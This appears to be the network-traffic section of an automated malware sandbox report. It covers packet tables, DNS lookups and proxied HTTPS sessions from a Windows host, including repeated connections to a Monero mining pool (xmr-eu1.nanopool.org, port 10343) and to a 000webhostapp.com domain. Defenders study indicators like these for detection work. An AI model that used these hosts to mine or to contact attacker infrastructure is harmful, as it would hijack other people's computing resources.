Apr 26, 2024 16:49:29.115447998 CEST	443	49764	145.14.144.253	192.168.2.4
Apr 26, 2024 16:49:31.270566940 CEST	10343	49752	51.15.65.182	192.168.2.4
Apr 26, 2024 16:49:31.473922968 CEST	49752	10343	192.168.2.4	51.15.65.182
Apr 26, 2024 16:49:41.239773035 CEST	10343	49752	51.15.65.182	192.168.2.4
Apr 26, 2024 16:49:41.286797047 CEST	49752	10343	192.168.2.4	51.15.65.182
Apr 26, 2024 16:49:51.240536928 CEST	10343	49752	51.15.65.182	192.168.2.4
Apr 26, 2024 16:49:51.380203009 CEST	49752	10343	192.168.2.4	51.15.65.182
Apr 26, 2024 16:50:01.783925056 CEST	10343	49752	51.15.65.182	192.168.2.4
Apr 26, 2024 16:50:01.974109888 CEST	49752	10343	192.168.2.4	51.15.65.182
Apr 26, 2024 16:50:11.273602009 CEST	10343	49752	51.15.65.182	192.168.2.4
Apr 26, 2024 16:50:11.421055079 CEST	49752	10343	192.168.2.4	51.15.65.182
Apr 26, 2024 16:50:16.091291904 CEST	10343	49752	51.15.65.182	192.168.2.4
Apr 26, 2024 16:50:16.286885977 CEST	49752	10343	192.168.2.4	51.15.65.182
Apr 26, 2024 16:50:26.314888000 CEST	10343	49752	51.15.65.182	192.168.2.4
Apr 26, 2024 16:50:26.380477905 CEST	49752	10343	192.168.2.4	51.15.65.182
Apr 26, 2024 16:50:29.147934914 CEST	49774	443	192.168.2.4	145.14.144.16
Apr 26, 2024 16:50:29.147973061 CEST	443	49774	145.14.144.16	192.168.2.4
Apr 26, 2024 16:50:29.148034096 CEST	49774	443	192.168.2.4	145.14.144.16
Apr 26, 2024 16:50:29.170228958 CEST	49774	443	192.168.2.4	145.14.144.16
Apr 26, 2024 16:50:29.170247078 CEST	443	49774	145.14.144.16	192.168.2.4
Apr 26, 2024 16:50:29.463610888 CEST	443	49774	145.14.144.16	192.168.2.4
Apr 26, 2024 16:50:29.464976072 CEST	49774	443	192.168.2.4	145.14.144.16
Apr 26, 2024 16:50:29.464999914 CEST	443	49774	145.14.144.16	192.168.2.4
Apr 26, 2024 16:50:29.466006994 CEST	443	49774	145.14.144.16	192.168.2.4
Apr 26, 2024 16:50:29.466146946 CEST	49774	443	192.168.2.4	145.14.144.16
Apr 26, 2024 16:50:29.467883110 CEST	49774	443	192.168.2.4	145.14.144.16
Apr 26, 2024 16:50:29.467967033 CEST	443	49774	145.14.144.16	192.168.2.4
Apr 26, 2024 16:50:29.468055010 CEST	49774	443	192.168.2.4	145.14.144.16
Apr 26, 2024 16:50:29.468070984 CEST	443	49774	145.14.144.16	192.168.2.4
Apr 26, 2024 16:50:29.584125042 CEST	49774	443	192.168.2.4	145.14.144.16
Apr 26, 2024 16:50:29.758374929 CEST	443	49774	145.14.144.16	192.168.2.4
Apr 26, 2024 16:50:29.758529902 CEST	443	49774	145.14.144.16	192.168.2.4
Apr 26, 2024 16:50:29.758625984 CEST	49774	443	192.168.2.4	145.14.144.16
Apr 26, 2024 16:50:29.771152020 CEST	49774	443	192.168.2.4	145.14.144.16
Apr 26, 2024 16:50:29.771171093 CEST	443	49774	145.14.144.16	192.168.2.4
Apr 26, 2024 16:50:36.202159882 CEST	10343	49752	51.15.65.182	192.168.2.4
Apr 26, 2024 16:50:36.285856009 CEST	49752	10343	192.168.2.4	51.15.65.182
Apr 26, 2024 16:50:46.187920094 CEST	10343	49752	51.15.65.182	192.168.2.4
Apr 26, 2024 16:50:46.286660910 CEST	49752	10343	192.168.2.4	51.15.65.182
Apr 26, 2024 16:50:56.726886988 CEST	10343	49752	51.15.65.182	192.168.2.4
Apr 26, 2024 16:50:56.786330938 CEST	49752	10343	192.168.2.4	51.15.65.182
Apr 26, 2024 16:51:06.240355015 CEST	10343	49752	51.15.65.182	192.168.2.4
Apr 26, 2024 16:51:06.286591053 CEST	49752	10343	192.168.2.4	51.15.65.182
Apr 26, 2024 16:51:16.114801884 CEST	10343	49752	51.15.65.182	192.168.2.4
Apr 26, 2024 16:51:16.193635941 CEST	49752	10343	192.168.2.4	51.15.65.182
Apr 26, 2024 16:51:26.162651062 CEST	10343	49752	51.15.65.182	192.168.2.4
Apr 26, 2024 16:51:26.286571026 CEST	49752	10343	192.168.2.4	51.15.65.182
Apr 26, 2024 16:51:27.834971905 CEST	49782	443	192.168.2.4	145.14.144.16
Apr 26, 2024 16:51:27.835059881 CEST	443	49782	145.14.144.16	192.168.2.4
Apr 26, 2024 16:51:27.835356951 CEST	49782	443	192.168.2.4	145.14.144.16
Apr 26, 2024 16:51:27.843604088 CEST	49782	443	192.168.2.4	145.14.144.16
Apr 26, 2024 16:51:27.843683004 CEST	443	49782	145.14.144.16	192.168.2.4
Apr 26, 2024 16:51:28.141655922 CEST	443	49782	145.14.144.16	192.168.2.4
Apr 26, 2024 16:51:28.142802000 CEST	49782	443	192.168.2.4	145.14.144.16
Apr 26, 2024 16:51:28.142829895 CEST	443	49782	145.14.144.16	192.168.2.4
Apr 26, 2024 16:51:28.143845081 CEST	443	49782	145.14.144.16	192.168.2.4
Apr 26, 2024 16:51:28.143913984 CEST	49782	443	192.168.2.4	145.14.144.16
Apr 26, 2024 16:51:28.145634890 CEST	49782	443	192.168.2.4	145.14.144.16
Apr 26, 2024 16:51:28.145706892 CEST	443	49782	145.14.144.16	192.168.2.4
Apr 26, 2024 16:51:28.145765066 CEST	49782	443	192.168.2.4	145.14.144.16
Apr 26, 2024 16:51:28.145772934 CEST	443	49782	145.14.144.16	192.168.2.4
Apr 26, 2024 16:51:28.145839930 CEST	49782	443	192.168.2.4	145.14.144.16
Apr 26, 2024 16:51:28.188200951 CEST	443	49782	145.14.144.16	192.168.2.4
Apr 26, 2024 16:51:28.438810110 CEST	443	49782	145.14.144.16	192.168.2.4
Apr 26, 2024 16:51:28.438939095 CEST	443	49782	145.14.144.16	192.168.2.4
Apr 26, 2024 16:51:28.439060926 CEST	49782	443	192.168.2.4	145.14.144.16
Apr 26, 2024 16:51:28.443361998 CEST	49782	443	192.168.2.4	145.14.144.16
Apr 26, 2024 16:51:28.443361998 CEST	49782	443	192.168.2.4	145.14.144.16
Apr 26, 2024 16:51:28.443427086 CEST	443	49782	145.14.144.16	192.168.2.4
Apr 26, 2024 16:51:36.211846113 CEST	10343	49752	51.15.65.182	192.168.2.4
Apr 26, 2024 16:51:36.387793064 CEST	49752	10343	192.168.2.4	51.15.65.182
Apr 26, 2024 16:51:46.316696882 CEST	10343	49752	51.15.65.182	192.168.2.4
Apr 26, 2024 16:51:46.473875999 CEST	49752	10343	192.168.2.4	51.15.65.182
Apr 26, 2024 16:51:56.298923969 CEST	10343	49752	51.15.65.182	192.168.2.4
Apr 26, 2024 16:51:56.474101067 CEST	49752	10343	192.168.2.4	51.15.65.182
Apr 26, 2024 16:52:06.304697037 CEST	10343	49752	51.15.65.182	192.168.2.4
Apr 26, 2024 16:52:06.452301979 CEST	49752	10343	192.168.2.4	51.15.65.182

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 16:48:09.194641113 CEST	53	63946	1.1.1.1	192.168.2.4
Apr 26, 2024 16:48:09.231174946 CEST	63963	53	192.168.2.4	1.1.1.1
Apr 26, 2024 16:48:09.231331110 CEST	61116	53	192.168.2.4	1.1.1.1
Apr 26, 2024 16:48:09.321755886 CEST	53	64171	1.1.1.1	192.168.2.4
Apr 26, 2024 16:48:09.356316090 CEST	53	61116	1.1.1.1	192.168.2.4
Apr 26, 2024 16:48:09.357132912 CEST	53	63963	1.1.1.1	192.168.2.4
Apr 26, 2024 16:48:11.733133078 CEST	53	50672	1.1.1.1	192.168.2.4
Apr 26, 2024 16:48:21.329024076 CEST	138	138	192.168.2.4	192.168.2.255
Apr 26, 2024 16:48:27.732961893 CEST	65323	53	192.168.2.4	1.1.1.1
Apr 26, 2024 16:48:27.859253883 CEST	53	65323	1.1.1.1	192.168.2.4
Apr 26, 2024 16:48:31.310003042 CEST	53	56955	1.1.1.1	192.168.2.4
Apr 26, 2024 16:48:31.439012051 CEST	61779	53	192.168.2.4	1.1.1.1
Apr 26, 2024 16:48:32.083154917 CEST	53	61779	1.1.1.1	192.168.2.4
Apr 26, 2024 16:48:46.275629997 CEST	57320	53	192.168.2.4	1.1.1.1
Apr 26, 2024 16:48:46.921137094 CEST	53	57320	1.1.1.1	192.168.2.4
Apr 26, 2024 16:48:50.289114952 CEST	53	50381	1.1.1.1	192.168.2.4
Apr 26, 2024 16:49:08.710376024 CEST	53	65100	1.1.1.1	192.168.2.4
Apr 26, 2024 16:49:14.585880041 CEST	53	64418	1.1.1.1	192.168.2.4
Apr 26, 2024 16:49:40.538429976 CEST	53	64242	1.1.1.1	192.168.2.4
Apr 26, 2024 16:50:26.603871107 CEST	53	63802	1.1.1.1	192.168.2.4
Apr 26, 2024 16:50:28.505067110 CEST	65329	53	192.168.2.4	1.1.1.1
Apr 26, 2024 16:50:29.147090912 CEST	53	65329	1.1.1.1	192.168.2.4
Apr 26, 2024 16:50:43.437509060 CEST	51906	53	192.168.2.4	1.1.1.1
Apr 26, 2024 16:50:44.089050055 CEST	53	51906	1.1.1.1	192.168.2.4
Apr 26, 2024 16:51:08.053539038 CEST	59788	53	192.168.2.4	1.1.1.1
Apr 26, 2024 16:51:08.697860003 CEST	53	59788	1.1.1.1	192.168.2.4
Apr 26, 2024 16:51:42.255011082 CEST	53	55814	1.1.1.1	192.168.2.4
Apr 26, 2024 16:51:57.413254976 CEST	63569	53	192.168.2.4	1.1.1.1
Apr 26, 2024 16:51:58.066123009 CEST	53	63569	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 26, 2024 16:48:09.231174946 CEST	192.168.2.4	1.1.1.1	0x7f46	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 16:48:09.231331110 CEST	192.168.2.4	1.1.1.1	0xfa07	Standard query (0)	www.google.com	65	IN (0x0001)	false
Apr 26, 2024 16:48:27.732961893 CEST	192.168.2.4	1.1.1.1	0xe2be	Standard query (0)	xmr-eu1.nanopool.org	A (IP address)	IN (0x0001)	false
Apr 26, 2024 16:48:31.439012051 CEST	192.168.2.4	1.1.1.1	0x3d96	Standard query (0)	pachydermal-deviati.000webhostapp.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 16:48:46.275629997 CEST	192.168.2.4	1.1.1.1	0x21cd	Standard query (0)	pachydermal-deviati.000webhostapp.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 16:50:28.505067110 CEST	192.168.2.4	1.1.1.1	0x83d0	Standard query (0)	pachydermal-deviati.000webhostapp.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 16:50:43.437509060 CEST	192.168.2.4	1.1.1.1	0xc66c	Standard query (0)	pachydermal-deviati.000webhostapp.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 16:51:08.053539038 CEST	192.168.2.4	1.1.1.1	0xc5c	Standard query (0)	pachydermal-deviati.000webhostapp.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 16:51:57.413254976 CEST	192.168.2.4	1.1.1.1	0x7e36	Standard query (0)	pachydermal-deviati.000webhostapp.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 26, 2024 16:48:09.356316090 CEST	1.1.1.1	192.168.2.4	0xfa07	No error (0)	www.google.com			65	IN (0x0001)	false
Apr 26, 2024 16:48:09.357132912 CEST	1.1.1.1	192.168.2.4	0x7f46	No error (0)	www.google.com		142.250.64.196	A (IP address)	IN (0x0001)	false
Apr 26, 2024 16:48:27.859253883 CEST	1.1.1.1	192.168.2.4	0xe2be	No error (0)	xmr-eu1.nanopool.org		212.47.253.124	A (IP address)	IN (0x0001)	false
Apr 26, 2024 16:48:27.859253883 CEST	1.1.1.1	192.168.2.4	0xe2be	No error (0)	xmr-eu1.nanopool.org		163.172.154.142	A (IP address)	IN (0x0001)	false
Apr 26, 2024 16:48:27.859253883 CEST	1.1.1.1	192.168.2.4	0xe2be	No error (0)	xmr-eu1.nanopool.org		141.94.23.83	A (IP address)	IN (0x0001)	false
Apr 26, 2024 16:48:27.859253883 CEST	1.1.1.1	192.168.2.4	0xe2be	No error (0)	xmr-eu1.nanopool.org		162.19.224.121	A (IP address)	IN (0x0001)	false
Apr 26, 2024 16:48:27.859253883 CEST	1.1.1.1	192.168.2.4	0xe2be	No error (0)	xmr-eu1.nanopool.org		51.15.193.130	A (IP address)	IN (0x0001)	false
Apr 26, 2024 16:48:27.859253883 CEST	1.1.1.1	192.168.2.4	0xe2be	No error (0)	xmr-eu1.nanopool.org		146.59.154.106	A (IP address)	IN (0x0001)	false
Apr 26, 2024 16:48:27.859253883 CEST	1.1.1.1	192.168.2.4	0xe2be	No error (0)	xmr-eu1.nanopool.org		54.37.232.103	A (IP address)	IN (0x0001)	false
Apr 26, 2024 16:48:27.859253883 CEST	1.1.1.1	192.168.2.4	0xe2be	No error (0)	xmr-eu1.nanopool.org		51.15.58.224	A (IP address)	IN (0x0001)	false
Apr 26, 2024 16:48:27.859253883 CEST	1.1.1.1	192.168.2.4	0xe2be	No error (0)	xmr-eu1.nanopool.org		51.15.65.182	A (IP address)	IN (0x0001)	false
Apr 26, 2024 16:48:27.859253883 CEST	1.1.1.1	192.168.2.4	0xe2be	No error (0)	xmr-eu1.nanopool.org		54.37.137.114	A (IP address)	IN (0x0001)	false
Apr 26, 2024 16:48:27.859253883 CEST	1.1.1.1	192.168.2.4	0xe2be	No error (0)	xmr-eu1.nanopool.org		51.89.23.91	A (IP address)	IN (0x0001)	false
Apr 26, 2024 16:48:32.083154917 CEST	1.1.1.1	192.168.2.4	0x3d96	No error (0)	pachydermal-deviati.000webhostapp.com	us-east-1.route-1.000webhost.awex.io		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 16:48:32.083154917 CEST	1.1.1.1	192.168.2.4	0x3d96	No error (0)	us-east-1.route-1.000webhost.awex.io		145.14.144.253	A (IP address)	IN (0x0001)	false
Apr 26, 2024 16:48:46.921137094 CEST	1.1.1.1	192.168.2.4	0x21cd	No error (0)	pachydermal-deviati.000webhostapp.com	us-east-1.route-1.000webhost.awex.io		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 16:48:46.921137094 CEST	1.1.1.1	192.168.2.4	0x21cd	No error (0)	us-east-1.route-1.000webhost.awex.io		145.14.144.9	A (IP address)	IN (0x0001)	false
Apr 26, 2024 16:50:29.147090912 CEST	1.1.1.1	192.168.2.4	0x83d0	No error (0)	pachydermal-deviati.000webhostapp.com	us-east-1.route-1.000webhost.awex.io		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 16:50:29.147090912 CEST	1.1.1.1	192.168.2.4	0x83d0	No error (0)	us-east-1.route-1.000webhost.awex.io		145.14.144.16	A (IP address)	IN (0x0001)	false
Apr 26, 2024 16:50:44.089050055 CEST	1.1.1.1	192.168.2.4	0xc66c	No error (0)	pachydermal-deviati.000webhostapp.com	us-east-1.route-1.000webhost.awex.io		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 16:50:44.089050055 CEST	1.1.1.1	192.168.2.4	0xc66c	No error (0)	us-east-1.route-1.000webhost.awex.io		145.14.144.16	A (IP address)	IN (0x0001)	false
Apr 26, 2024 16:51:08.697860003 CEST	1.1.1.1	192.168.2.4	0xc5c	No error (0)	pachydermal-deviati.000webhostapp.com	us-east-1.route-1.000webhost.awex.io		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 16:51:08.697860003 CEST	1.1.1.1	192.168.2.4	0xc5c	No error (0)	us-east-1.route-1.000webhost.awex.io		145.14.145.134	A (IP address)	IN (0x0001)	false
Apr 26, 2024 16:51:58.066123009 CEST	1.1.1.1	192.168.2.4	0x7e36	No error (0)	pachydermal-deviati.000webhostapp.com	us-east-1.route-1.000webhost.awex.io		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 16:51:58.066123009 CEST	1.1.1.1	192.168.2.4	0x7e36	No error (0)	us-east-1.route-1.000webhost.awex.io		145.14.145.9	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.google.com

slscr.update.microsoft.com

pachydermal-deviati.000webhostapp.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49735	142.250.64.196	443	7880	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 14:48:10 UTC	607	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 14:48:11 UTC	1703	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 14:48:11 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-NJ78_go9Ual52LvHKH0zTQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-04-26 14:48:11 UTC	610	IN	Data Raw: 32 35 62 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 66 69 6e 61 6c 20 6a 65 6f 70 61 72 64 79 20 61 70 72 69 6c 20 32 35 22 2c 22 73 6f 75 74 68 77 65 73 74 20 61 69 72 6c 69 6e 65 73 20 61 69 72 70 6f 72 74 73 22 2c 22 73 74 75 64 65 6e 74 20 6c 6f 61 6e 73 22 2c 22 6a 61 63 6b 73 6f 6e 20 73 74 61 74 65 20 63 6f 61 63 68 20 74 6f 6d 65 6b 69 61 20 72 65 65 64 22 2c 22 62 6c 69 7a 7a 61 72 64 20 63 61 6e 63 65 6c 65 64 20 62 6c 69 7a 7a 63 6f 6e 22 2c 22 73 6c 69 70 6b 6e 6f 74 20 64 72 75 6d 6d 65 72 22 2c 22 73 6c 61 63 6b 20 73 74 65 77 61 72 74 20 62 75 74 74 65 72 66 69 65 6c 64 22 2c 22 73 6f 75 74 68 20 63 61 72 6f 6c 69 6e 61 20 63 69 63 61 64 61 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 Data Ascii: 25b)]}'["",["final jeopardy april 25","southwest airlines airports","student loans","jackson state coach tomekia reed","blizzard canceled blizzcon","slipknot drummer","slack stewart butterfield","south carolina cicadas"],["","","","","","","",""],[],{"
2024-04-26 14:48:11 UTC	95	IN	Data Raw: 35 39 0d 0a 51 55 46 52 51 55 4a 42 51 55 51 76 4d 6e 64 44 52 55 46 42 61 30 64 43 64 32 64 49 51 6d 64 72 53 55 4a 33 5a 30 74 44 5a 32 74 4d 52 46 4a 5a 55 45 52 52 64 30 31 45 55 6e 4e 56 52 6c 4a 42 56 30 6c 43 4d 47 6c 4a 61 55 46 6b 53 48 67 34 61 30 74 45 55 58 4e 4b 51 0d 0a Data Ascii: 59QUFRQUJBQUQvMndDRUFBa0dCd2dIQmdrSUJ3Z0tDZ2tMRFJZUERRd01EUnNVRlJBV0lCMGlJaUFkSHg4a0tEUXNKQ
2024-04-26 14:48:11 UTC	1255	IN	Data Raw: 61 33 34 0d 0a 31 6c 34 53 6e 67 34 5a 6b 78 55 4d 48 52 4e 56 46 55 7a 54 32 70 76 4e 6b 6c 35 63 79 39 53 52 44 67 30 55 58 70 52 4e 55 39 71 59 30 4a 44 5a 32 39 4c 52 46 46 33 54 6b 64 6e 4f 46 42 48 61 6d 4e 73 53 48 6c 56 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 4c 79 39 42 51 55 4a 46 53 55 46 46 51 55 46 52 51 55 31 43 53 57 64 42 51 30 56 52 52 55 52 46 55 55 67 76 65 45 46 42 59 30 46 42 51 55 4e 42 5a 30 31 43 51 56 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 52 55 4a 52 54 55 64 42 55 55 6c 49 51 30 46 45 4c 33 68 Data Ascii: a341l4Sng4ZkxUMHRNVFUzT2pvNkl5cy9SRDg0UXpRNU9qY0JDZ29LRFF3TkdnOFBHamNsSHlVM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOLy9BQUJFSUFFQUFRQU1CSWdBQ0VRRURFUUgveEFBY0FBQUNBZ01CQVFBQUFBQUFBQUFBQUFBRUJRTUdBUUlIQ0FEL3h
2024-04-26 14:48:11 UTC	1255	IN	Data Raw: 7a 54 55 35 34 54 43 73 7a 51 6b 6b 7a 52 45 39 52 61 44 56 57 54 45 70 78 56 6e 68 68 55 58 5a 61 65 45 68 68 63 47 74 46 61 48 6c 32 52 6b 68 42 4d 6d 35 75 65 54 5a 6c 62 46 6c 55 62 32 4e 43 64 57 39 73 57 45 74 33 4d 6b 64 36 5a 56 70 77 55 56 68 56 59 6b 64 4c 5a 56 6f 32 4d 54 42 69 4f 45 5a 35 64 47 70 78 4d 6e 46 4d 54 33 6c 6f 4d 32 64 71 4d 6b 78 75 4e 48 4e 4e 4d 6d 4e 6c 56 31 49 32 4d 58 6c 31 53 7a 6c 6c 54 30 39 51 61 56 4a 75 61 6d 35 78 5a 6b 64 74 56 6e 5a 6c 4e 55 4e 6f 64 6d 55 33 64 53 39 4f 56 56 68 4b 4e 47 6b 34 56 44 42 6d 4d 6d 68 53 5a 46 51 77 53 46 56 4d 52 6a 52 61 62 46 63 32 64 46 70 4a 4d 56 6c 4d 62 6b 63 31 56 47 63 34 53 7a 68 32 55 48 64 6f 54 45 56 5a 55 46 68 33 63 6e 42 6c 61 44 6c 32 5a 46 4a 30 65 45 5a 49 5a 6e Data Ascii: zTU54TCszQkkzRE9RaDVWTEpxVnhhUXZaeEhhcGtFaHl2RkhBMm5ueTZlbFlUb2NCdW9sWEt3Mkd6ZVpwUVhVYkdLZVo2MTBiOEZ5dGpxMnFMT3loM2dqMkxuNHNNMmNlV1I2MXl1SzllT09QaVJuam5xZkdtVnZlNUNodmU3dS9OVVhKNGk4VDBmMmhSZFQwSFVMRjRabFc2dFpJMVlMbkc1VGc4Szh2UHdoTEVZUFh3cnBlaDl2ZFJ0eEZIZn
2024-04-26 14:48:11 UTC	109	IN	Data Raw: 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 74 79 70 65 22 3a 5b 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 45 4e 54 49 54 59 22 2c 22 51 55 45 52 59 22 5d 7d 5d 0d 0a Data Ascii: 362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","ENTITY","QUERY"]}]
2024-04-26 14:48:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	142.250.64.196	443	7880	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 14:48:10 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49734	142.250.64.196	443	7880	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 14:48:10 UTC	510	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 14:48:11 UTC	1843	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGKv9rrEGIjCUP8rJI6uQpcCA_sA23NWIvsltkwq3MeDorQiPFEiOdS9-9s9TL79P98P43HdQwyEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgwIq_2usQYQ6OXmwwESBGaBmNw Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Fri, 26 Apr 2024 14:48:11 GMT Server: gws Content-Length: 458 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-04-26-14; expires=Sun, 26-May-2024 14:48:11 GMT; path=/; domain=.google.com; Secure; 